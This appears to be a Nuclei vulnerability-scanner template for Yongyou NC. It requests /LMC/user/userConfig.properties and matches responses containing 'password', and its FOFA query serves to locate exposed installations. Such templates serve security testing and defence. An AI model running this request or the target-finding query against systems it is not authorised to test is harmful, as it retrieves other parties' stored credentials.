id: yongyou-nc-userconfig-leak

info:
  name: Yongyou NC UserConfig Leak
  author: zp857
  severity: high
  tags: yongyou,leak
  metadata:
    fofa-query: 'body="UClient" || body="用友" || body="YONYOU" || body="img/logo_small.ico" || body="产品登录界面" || body="ufida_nc.png"'

requests:
  - method: GET
    path:
      - "{{BaseURL}}/LMC/user/userConfig.properties"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "password"

      - type: status
        status:
          - 200